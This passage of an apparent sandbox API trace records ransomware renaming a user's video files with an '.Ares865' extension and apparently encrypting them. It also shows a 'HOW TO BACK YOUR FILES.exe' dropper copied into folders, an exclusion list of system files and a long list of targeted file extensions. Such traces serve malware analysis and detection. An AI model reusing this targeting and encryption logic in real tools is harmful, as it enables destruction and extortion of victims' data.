halpmcxz\\videos\\ydr8ingbrksvbw\\puwdkzf9ud\\andco4sgwz\\kwxmmyhtoh37.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\anDCO4sGwz\\KwXMMyhtOH37.avi.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\puwdkzf9ud\\andco4sgwz\\kwxmmyhtoh37.avi.ares865"), dwFlags=0x1) returned 1 [0092.031] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\anDCO4sGwz\\KwXMMyhtOH37.avi.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\puwdkzf9ud\\andco4sgwz\\kwxmmyhtoh37.avi.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0092.031] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=43600) returned 1 [0092.031] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0092.032] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0092.032] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0092.032] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0092.032] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0092.032] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.033] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xad50, lpName=0x0) returned 0x15c [0092.033] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xad50) returned 0x190000 [0092.034] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0092.035] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0092.035] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.035] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0092.035] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0092.035] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0092.035] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0092.035] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0092.035] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0092.035] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0092.036] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0092.036] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0092.036] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0092.036] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0092.036] CloseHandle (hObject=0x15c) returned 1 [0092.036] CloseHandle (hObject=0x118) returned 1 [0092.037] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0092.037] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0092.037] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0092.038] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4aa6b2c0, ftCreationTime.dwHighDateTime=0x1d4c78a, ftLastAccessTime.dwLowDateTime=0x8e0483b0, ftLastAccessTime.dwHighDateTime=0x1d4c679, ftLastWriteTime.dwLowDateTime=0x8e0483b0, ftLastWriteTime.dwHighDateTime=0x1d4c679, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="KwXMMyhtOH37.avi", cAlternateFileName="KWXMMY~1.AVI")) returned 0 [0092.038] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0092.038] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7a50 [0092.038] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\1VAkHoTsRMAqAh6", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\1VAkHoTsRMAqAh6") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\1VAkHoTsRMAqAh6" [0092.038] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d7700 | out: hHeap=0x2b0000) returned 1 [0092.038] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a48 | out: hHeap=0x2b0000) returned 1 [0092.038] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\1VAkHoTsRMAqAh6") returned 78 [0092.038] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\1VAkHoTsRMAqAh6" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\1VAkHoTsRMAqAh6") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\1VAkHoTsRMAqAh6" [0092.038] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0092.038] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\1VAkHoTsRMAqAh6\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\puwdkzf9ud\\1vakhotsrmaqah6\\how to back your files.exe"), bFailIfExists=1) returned 0 [0092.038] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0092.039] GetLastError () returned 0x0 [0092.039] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0092.039] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0092.039] CloseHandle (hObject=0x120) returned 1 [0092.039] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0092.039] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0092.039] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\1VAkHoTsRMAqAh6\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x609752d0, ftCreationTime.dwHighDateTime=0x1d4d255, ftLastAccessTime.dwLowDateTime=0x4d09faa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d09faa0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0092.039] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0092.039] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0092.039] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0092.039] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x609752d0, ftCreationTime.dwHighDateTime=0x1d4d255, ftLastAccessTime.dwLowDateTime=0x4d09faa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d09faa0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0092.039] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0092.039] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0092.039] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0092.039] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0092.039] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb4a0da0, ftCreationTime.dwHighDateTime=0x1d4cf98, ftLastAccessTime.dwLowDateTime=0xab2ab80, ftLastAccessTime.dwHighDateTime=0x1d4ca21, ftLastWriteTime.dwLowDateTime=0xab2ab80, ftLastWriteTime.dwHighDateTime=0x1d4ca21, nFileSizeHigh=0x0, nFileSizeLow=0x15b17, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="33XI.mp4", cAlternateFileName="")) returned 1 [0092.039] lstrcmpiW (lpString1="33XI.mp4", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0092.039] lstrcmpiW (lpString1="33XI.mp4", lpString2="aoldtz.exe") returned -1 [0092.039] lstrcmpiW (lpString1="33XI.mp4", lpString2=".") returned 1 [0092.039] lstrcmpiW (lpString1="33XI.mp4", lpString2="..") returned 1 [0092.039] lstrcmpiW (lpString1="33XI.mp4", lpString2="windows") returned -1 [0092.039] lstrcmpiW (lpString1="33XI.mp4", lpString2="bootmgr") returned -1 [0092.039] lstrcmpiW (lpString1="33XI.mp4", lpString2="temp") returned -1 [0092.039] lstrcmpiW (lpString1="33XI.mp4", lpString2="pagefile.sys") returned -1 [0092.039] lstrcmpiW (lpString1="33XI.mp4", lpString2="boot") returned -1 [0092.039] lstrcmpiW (lpString1="33XI.mp4", lpString2="ids.txt") returned -1 [0092.040] lstrcmpiW (lpString1="33XI.mp4", lpString2="ntuser.dat") returned -1 [0092.040] lstrcmpiW (lpString1="33XI.mp4", lpString2="perflogs") returned -1 [0092.040] lstrcmpiW (lpString1="33XI.mp4", lpString2="MSBuild") returned -1 [0092.040] lstrlenW (lpString="33XI.mp4") returned 8 [0092.040] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\1VAkHoTsRMAqAh6\\*") returned 80 [0092.040] lstrcpyW (in: lpString1=0x2cce49e, lpString2="33XI.mp4" | out: lpString1="33XI.mp4") returned="33XI.mp4" [0092.040] lstrlenW (lpString="33XI.mp4") returned 8 [0092.040] lstrlenW (lpString="Ares865") returned 7 [0092.040] lstrcmpiW (lpString1="3XI.mp4", lpString2="Ares865") returned -1 [0092.040] lstrlenW (lpString=".dll") returned 4 [0092.040] lstrcmpiW (lpString1="33XI.mp4", lpString2=".dll") returned 1 [0092.040] lstrlenW (lpString=".lnk") returned 4 [0092.040] lstrcmpiW (lpString1="33XI.mp4", lpString2=".lnk") returned 1 [0092.040] lstrlenW (lpString=".ini") returned 4 [0092.040] lstrcmpiW (lpString1="33XI.mp4", lpString2=".ini") returned 1 [0092.040] lstrlenW (lpString=".sys") returned 4 [0092.040] lstrcmpiW (lpString1="33XI.mp4", lpString2=".sys") returned 1 [0092.040] lstrlenW (lpString="33XI.mp4") returned 8 [0092.040] lstrlenW (lpString="bak") returned 3 [0092.040] lstrcmpiW (lpString1="mp4", lpString2="bak") returned 1 [0092.040] lstrlenW (lpString="ba_") returned 3 [0092.040] lstrcmpiW (lpString1="mp4", lpString2="ba_") returned 1 [0092.040] lstrlenW (lpString="dbb") returned 3 [0092.040] lstrcmpiW (lpString1="mp4", lpString2="dbb") returned 1 [0092.040] lstrlenW (lpString="vmdk") returned 4 [0092.040] lstrcmpiW (lpString1=".mp4", lpString2="vmdk") returned -1 [0092.040] lstrlenW (lpString="rar") returned 3 [0092.040] lstrcmpiW (lpString1="mp4", lpString2="rar") returned -1 [0092.040] lstrlenW (lpString="zip") returned 3 [0092.040] lstrcmpiW (lpString1="mp4", lpString2="zip") returned -1 [0092.040] lstrlenW (lpString="tgz") returned 3 [0092.040] lstrcmpiW (lpString1="mp4", lpString2="tgz") returned -1 [0092.040] lstrlenW (lpString="vbox") returned 4 [0092.040] lstrcmpiW (lpString1=".mp4", lpString2="vbox") returned -1 [0092.040] lstrlenW (lpString="vdi") returned 3 [0092.040] lstrcmpiW (lpString1="mp4", lpString2="vdi") returned -1 [0092.040] lstrlenW (lpString="vhd") returned 3 [0092.040] lstrcmpiW (lpString1="mp4", lpString2="vhd") returned -1 [0092.041] lstrlenW (lpString="vhdx") returned 4 [0092.041] lstrcmpiW (lpString1=".mp4", lpString2="vhdx") returned -1 [0092.041] lstrlenW (lpString="avhd") returned 4 [0092.041] lstrcmpiW (lpString1=".mp4", lpString2="avhd") returned -1 [0092.041] lstrlenW (lpString="db") returned 2 [0092.041] lstrcmpiW (lpString1="p4", lpString2="db") returned 1 [0092.041] lstrlenW (lpString="db2") returned 3 [0092.041] lstrcmpiW (lpString1="mp4", lpString2="db2") returned 1 [0092.041] lstrlenW (lpString="db3") returned 3 [0092.041] lstrcmpiW (lpString1="mp4", lpString2="db3") returned 1 [0092.041] lstrlenW (lpString="dbf") returned 3 [0092.041] lstrcmpiW (lpString1="mp4", lpString2="dbf") returned 1 [0092.041] lstrlenW (lpString="mdf") returned 3 [0092.041] lstrcmpiW (lpString1="mp4", lpString2="mdf") returned 1 [0092.041] lstrlenW (lpString="mdb") returned 3 [0092.041] lstrcmpiW (lpString1="mp4", lpString2="mdb") returned 1 [0092.041] lstrlenW (lpString="sql") returned 3 [0092.041] lstrcmpiW (lpString1="mp4", lpString2="sql") returned -1 [0092.041] lstrlenW (lpString="sqlite") returned 6 [0092.041] lstrcmpiW (lpString1="XI.mp4", lpString2="sqlite") returned 1 [0092.041] lstrlenW (lpString="sqlite3") returned 7 [0092.041] lstrcmpiW (lpString1="3XI.mp4", lpString2="sqlite3") returned -1 [0092.041] lstrlenW (lpString="sqlitedb") returned 8 [0092.041] lstrlenW (lpString="xml") returned 3 [0092.041] lstrcmpiW (lpString1="mp4", lpString2="xml") returned -1 [0092.041] lstrlenW (lpString="$er") returned 3 [0092.041] lstrcmpiW (lpString1="mp4", lpString2="$er") returned 1 [0092.041] lstrlenW (lpString="4dd") returned 3 [0092.041] lstrcmpiW (lpString1="mp4", lpString2="4dd") returned 1 [0092.041] lstrlenW (lpString="4dl") returned 3 [0092.041] lstrcmpiW (lpString1="mp4", lpString2="4dl") returned 1 [0092.041] lstrlenW (lpString="^^^") returned 3 [0092.041] lstrcmpiW (lpString1="mp4", lpString2="^^^") returned 1 [0092.041] lstrlenW (lpString="abs") returned 3 [0092.041] lstrcmpiW (lpString1="mp4", lpString2="abs") returned 1 [0092.041] lstrlenW (lpString="abx") returned 3 [0092.041] lstrcmpiW (lpString1="mp4", lpString2="abx") returned 1 [0092.042] lstrlenW (lpString="accdb") returned 5 [0092.042] lstrcmpiW (lpString1="I.mp4", lpString2="accdb") returned 1 [0092.042] lstrlenW (lpString="accdc") returned 5 [0092.042] lstrcmpiW (lpString1="I.mp4", lpString2="accdc") returned 1 [0092.042] lstrlenW (lpString="accde") returned 5 [0092.042] lstrcmpiW (lpString1="I.mp4", lpString2="accde") returned 1 [0092.042] lstrlenW (lpString="accdr") returned 5 [0092.042] lstrcmpiW (lpString1="I.mp4", lpString2="accdr") returned 1 [0092.042] lstrlenW (lpString="accdt") returned 5 [0092.042] lstrcmpiW (lpString1="I.mp4", lpString2="accdt") returned 1 [0092.042] lstrlenW (lpString="accdw") returned 5 [0092.042] lstrcmpiW (lpString1="I.mp4", lpString2="accdw") returned 1 [0092.042] lstrlenW (lpString="accft") returned 5 [0092.042] lstrcmpiW (lpString1="I.mp4", lpString2="accft") returned 1 [0092.042] lstrlenW (lpString="adb") returned 3 [0092.042] lstrcmpiW (lpString1="mp4", lpString2="adb") returned 1 [0092.042] lstrlenW (lpString="adb") returned 3 [0092.042] lstrcmpiW (lpString1="mp4", lpString2="adb") returned 1 [0092.042] lstrlenW (lpString="ade") returned 3 [0092.042] lstrcmpiW (lpString1="mp4", lpString2="ade") returned 1 [0092.042] lstrlenW (lpString="adf") returned 3 [0092.042] lstrcmpiW (lpString1="mp4", lpString2="adf") returned 1 [0092.042] lstrlenW (lpString="adn") returned 3 [0092.042] lstrcmpiW (lpString1="mp4", lpString2="adn") returned 1 [0092.042] lstrlenW (lpString="adp") returned 3 [0092.042] lstrcmpiW (lpString1="mp4", lpString2="adp") returned 1 [0092.042] lstrlenW (lpString="alf") returned 3 [0092.042] lstrcmpiW (lpString1="mp4", lpString2="alf") returned 1 [0092.042] lstrlenW (lpString="ask") returned 3 [0092.042] lstrcmpiW (lpString1="mp4", lpString2="ask") returned 1 [0092.042] lstrlenW (lpString="btr") returned 3 [0092.042] lstrcmpiW (lpString1="mp4", lpString2="btr") returned 1 [0092.042] lstrlenW (lpString="cat") returned 3 [0092.042] lstrcmpiW (lpString1="mp4", lpString2="cat") returned 1 [0092.042] lstrlenW (lpString="cdb") returned 3 [0092.042] lstrcmpiW (lpString1="mp4", lpString2="cdb") returned 1 [0092.042] lstrlenW (lpString="ckp") returned 3 [0092.043] lstrcmpiW (lpString1="mp4", lpString2="ckp") returned 1 [0092.043] lstrlenW (lpString="cma") returned 3 [0092.043] lstrcmpiW (lpString1="mp4", lpString2="cma") returned 1 [0092.043] lstrlenW (lpString="cpd") returned 3 [0092.043] lstrcmpiW (lpString1="mp4", lpString2="cpd") returned 1 [0092.043] lstrlenW (lpString="dacpac") returned 6 [0092.043] lstrcmpiW (lpString1="XI.mp4", lpString2="dacpac") returned 1 [0092.043] lstrlenW (lpString="dad") returned 3 [0092.043] lstrcmpiW (lpString1="mp4", lpString2="dad") returned 1 [0092.043] lstrlenW (lpString="dadiagrams") returned 10 [0092.043] lstrlenW (lpString="daschema") returned 8 [0092.043] lstrlenW (lpString="db-journal") returned 10 [0092.043] lstrlenW (lpString="db-shm") returned 6 [0092.043] lstrcmpiW (lpString1="XI.mp4", lpString2="db-shm") returned 1 [0092.043] lstrlenW (lpString="db-wal") returned 6 [0092.043] lstrcmpiW (lpString1="XI.mp4", lpString2="db-wal") returned 1 [0092.043] lstrlenW (lpString="dbc") returned 3 [0092.043] lstrcmpiW (lpString1="mp4", lpString2="dbc") returned 1 [0092.043] lstrlenW (lpString="dbs") returned 3 [0092.043] lstrcmpiW (lpString1="mp4", lpString2="dbs") returned 1 [0092.043] lstrlenW (lpString="dbt") returned 3 [0092.043] lstrcmpiW (lpString1="mp4", lpString2="dbt") returned 1 [0092.043] lstrlenW (lpString="dbv") returned 3 [0092.043] lstrcmpiW (lpString1="mp4", lpString2="dbv") returned 1 [0092.043] lstrlenW (lpString="dbx") returned 3 [0092.043] lstrcmpiW (lpString1="mp4", lpString2="dbx") returned 1 [0092.043] lstrlenW (lpString="dcb") returned 3 [0092.043] lstrcmpiW (lpString1="mp4", lpString2="dcb") returned 1 [0092.043] lstrlenW (lpString="dct") returned 3 [0092.043] lstrcmpiW (lpString1="mp4", lpString2="dct") returned 1 [0092.043] lstrlenW (lpString="dcx") returned 3 [0092.043] lstrcmpiW (lpString1="mp4", lpString2="dcx") returned 1 [0092.043] lstrlenW (lpString="ddl") returned 3 [0092.043] lstrcmpiW (lpString1="mp4", lpString2="ddl") returned 1 [0092.043] lstrlenW (lpString="dlis") returned 4 [0092.043] lstrcmpiW (lpString1=".mp4", lpString2="dlis") returned -1 [0092.043] lstrlenW (lpString="dp1") returned 3 [0092.043] lstrcmpiW (lpString1="mp4", lpString2="dp1") returned 1 [0092.043] lstrlenW (lpString="dqy") returned 3 [0092.044] lstrcmpiW (lpString1="mp4", lpString2="dqy") returned 1 [0092.044] lstrlenW (lpString="dsk") returned 3 [0092.044] lstrcmpiW (lpString1="mp4", lpString2="dsk") returned 1 [0092.044] lstrlenW (lpString="dsn") returned 3 [0092.044] lstrcmpiW (lpString1="mp4", lpString2="dsn") returned 1 [0092.044] lstrlenW (lpString="dtsx") returned 4 [0092.044] lstrcmpiW (lpString1=".mp4", lpString2="dtsx") returned -1 [0092.044] lstrlenW (lpString="dxl") returned 3 [0092.044] lstrcmpiW (lpString1="mp4", lpString2="dxl") returned 1 [0092.044] lstrlenW (lpString="eco") returned 3 [0092.044] lstrcmpiW (lpString1="mp4", lpString2="eco") returned 1 [0092.044] lstrlenW (lpString="ecx") returned 3 [0092.044] lstrcmpiW (lpString1="mp4", lpString2="ecx") returned 1 [0092.044] lstrlenW (lpString="edb") returned 3 [0092.044] lstrcmpiW (lpString1="mp4", lpString2="edb") returned 1 [0092.044] lstrlenW (lpString="epim") returned 4 [0092.044] lstrcmpiW (lpString1=".mp4", lpString2="epim") returned -1 [0092.044] lstrlenW (lpString="fcd") returned 3 [0092.044] lstrcmpiW (lpString1="mp4", lpString2="fcd") returned 1 [0092.044] lstrlenW (lpString="fdb") returned 3 [0092.044] lstrcmpiW (lpString1="mp4", lpString2="fdb") returned 1 [0092.044] lstrlenW (lpString="fic") returned 3 [0092.044] lstrcmpiW (lpString1="mp4", lpString2="fic") returned 1 [0092.044] lstrlenW (lpString="flexolibrary") returned 12 [0092.044] lstrlenW (lpString="fm5") returned 3 [0092.044] lstrcmpiW (lpString1="mp4", lpString2="fm5") returned 1 [0092.044] lstrlenW (lpString="fmp") returned 3 [0092.044] lstrcmpiW (lpString1="mp4", lpString2="fmp") returned 1 [0092.044] lstrlenW (lpString="fmp12") returned 5 [0092.044] lstrcmpiW (lpString1="I.mp4", lpString2="fmp12") returned 1 [0092.044] lstrlenW (lpString="fmpsl") returned 5 [0092.044] lstrcmpiW (lpString1="I.mp4", lpString2="fmpsl") returned 1 [0092.044] lstrlenW (lpString="fol") returned 3 [0092.044] lstrcmpiW (lpString1="mp4", lpString2="fol") returned 1 [0092.044] lstrlenW (lpString="fp3") returned 3 [0092.044] lstrcmpiW (lpString1="mp4", lpString2="fp3") returned 1 [0092.044] lstrlenW (lpString="fp4") returned 3 [0092.044] lstrcmpiW (lpString1="mp4", lpString2="fp4") returned 1 [0092.045] lstrlenW (lpString="fp5") returned 3 [0092.045] lstrcmpiW (lpString1="mp4", lpString2="fp5") returned 1 [0092.045] lstrlenW (lpString="fp7") returned 3 [0092.045] lstrcmpiW (lpString1="mp4", lpString2="fp7") returned 1 [0092.045] lstrlenW (lpString="fpt") returned 3 [0092.045] lstrcmpiW (lpString1="mp4", lpString2="fpt") returned 1 [0092.045] lstrlenW (lpString="frm") returned 3 [0092.045] lstrcmpiW (lpString1="mp4", lpString2="frm") returned 1 [0092.045] lstrlenW (lpString="gdb") returned 3 [0092.045] lstrcmpiW (lpString1="mp4", lpString2="gdb") returned 1 [0092.045] lstrlenW (lpString="gdb") returned 3 [0092.045] lstrcmpiW (lpString1="mp4", lpString2="gdb") returned 1 [0092.045] lstrlenW (lpString="grdb") returned 4 [0092.045] lstrcmpiW (lpString1=".mp4", lpString2="grdb") returned -1 [0092.045] lstrlenW (lpString="gwi") returned 3 [0092.045] lstrcmpiW (lpString1="mp4", lpString2="gwi") returned 1 [0092.045] lstrlenW (lpString="hdb") returned 3 [0092.045] lstrcmpiW (lpString1="mp4", lpString2="hdb") returned 1 [0092.045] lstrlenW (lpString="his") returned 3 [0092.045] lstrcmpiW (lpString1="mp4", lpString2="his") returned 1 [0092.045] lstrlenW (lpString="ib") returned 2 [0092.045] lstrcmpiW (lpString1="p4", lpString2="ib") returned 1 [0092.045] lstrlenW (lpString="idb") returned 3 [0092.045] lstrcmpiW (lpString1="mp4", lpString2="idb") returned 1 [0092.045] lstrlenW (lpString="ihx") returned 3 [0092.045] lstrcmpiW (lpString1="mp4", lpString2="ihx") returned 1 [0092.045] lstrlenW (lpString="itdb") returned 4 [0092.045] lstrcmpiW (lpString1=".mp4", lpString2="itdb") returned -1 [0092.045] lstrlenW (lpString="itw") returned 3 [0092.045] lstrcmpiW (lpString1="mp4", lpString2="itw") returned 1 [0092.045] lstrlenW (lpString="jet") returned 3 [0092.045] lstrcmpiW (lpString1="mp4", lpString2="jet") returned 1 [0092.045] lstrlenW (lpString="jtx") returned 3 [0092.045] lstrcmpiW (lpString1="mp4", lpString2="jtx") returned 1 [0092.045] lstrlenW (lpString="kdb") returned 3 [0092.045] lstrcmpiW (lpString1="mp4", lpString2="kdb") returned 1 [0092.045] lstrlenW (lpString="kexi") returned 4 [0092.046] lstrcmpiW (lpString1=".mp4", lpString2="kexi") returned -1 [0092.046] lstrlenW (lpString="kexic") returned 5 [0092.046] lstrcmpiW (lpString1="I.mp4", lpString2="kexic") returned -1 [0092.046] lstrlenW (lpString="kexis") returned 5 [0092.046] lstrcmpiW (lpString1="I.mp4", lpString2="kexis") returned -1 [0092.046] lstrlenW (lpString="lgc") returned 3 [0092.046] lstrcmpiW (lpString1="mp4", lpString2="lgc") returned 1 [0092.046] lstrlenW (lpString="lwx") returned 3 [0092.046] lstrcmpiW (lpString1="mp4", lpString2="lwx") returned 1 [0092.046] lstrlenW (lpString="maf") returned 3 [0092.046] lstrcmpiW (lpString1="mp4", lpString2="maf") returned 1 [0092.046] lstrlenW (lpString="maq") returned 3 [0092.046] lstrcmpiW (lpString1="mp4", lpString2="maq") returned 1 [0092.046] lstrlenW (lpString="mar") returned 3 [0092.046] lstrcmpiW (lpString1="mp4", lpString2="mar") returned 1 [0092.046] lstrlenW (lpString="marshal") returned 7 [0092.046] lstrcmpiW (lpString1="3XI.mp4", lpString2="marshal") returned -1 [0092.046] lstrlenW (lpString="mas") returned 3 [0092.046] lstrcmpiW (lpString1="mp4", lpString2="mas") returned 1 [0092.046] lstrlenW (lpString="mav") returned 3 [0092.046] lstrcmpiW (lpString1="mp4", lpString2="mav") returned 1 [0092.046] lstrlenW (lpString="maw") returned 3 [0092.046] lstrcmpiW (lpString1="mp4", lpString2="maw") returned 1 [0092.046] lstrlenW (lpString="mdbhtml") returned 7 [0092.046] lstrcmpiW (lpString1="3XI.mp4", lpString2="mdbhtml") returned -1 [0092.046] lstrlenW (lpString="mdn") returned 3 [0092.046] lstrcmpiW (lpString1="mp4", lpString2="mdn") returned 1 [0092.046] lstrlenW (lpString="mdt") returned 3 [0092.046] lstrcmpiW (lpString1="mp4", lpString2="mdt") returned 1 [0092.046] lstrlenW (lpString="mfd") returned 3 [0092.046] lstrcmpiW (lpString1="mp4", lpString2="mfd") returned 1 [0092.046] lstrlenW (lpString="mpd") returned 3 [0092.046] lstrcmpiW (lpString1="mp4", lpString2="mpd") returned -1 [0092.046] lstrlenW (lpString="mrg") returned 3 [0092.046] lstrcmpiW (lpString1="mp4", lpString2="mrg") returned -1 [0092.046] lstrlenW (lpString="mud") returned 3 [0092.046] lstrcmpiW (lpString1="mp4", lpString2="mud") returned -1 [0092.046] lstrlenW (lpString="mwb") returned 3 [0092.047] lstrcmpiW (lpString1="mp4", lpString2="mwb") returned -1 [0092.047] lstrlenW (lpString="myd") returned 3 [0092.047] lstrcmpiW (lpString1="mp4", lpString2="myd") returned -1 [0092.047] lstrlenW (lpString="ndf") returned 3 [0092.047] lstrcmpiW (lpString1="mp4", 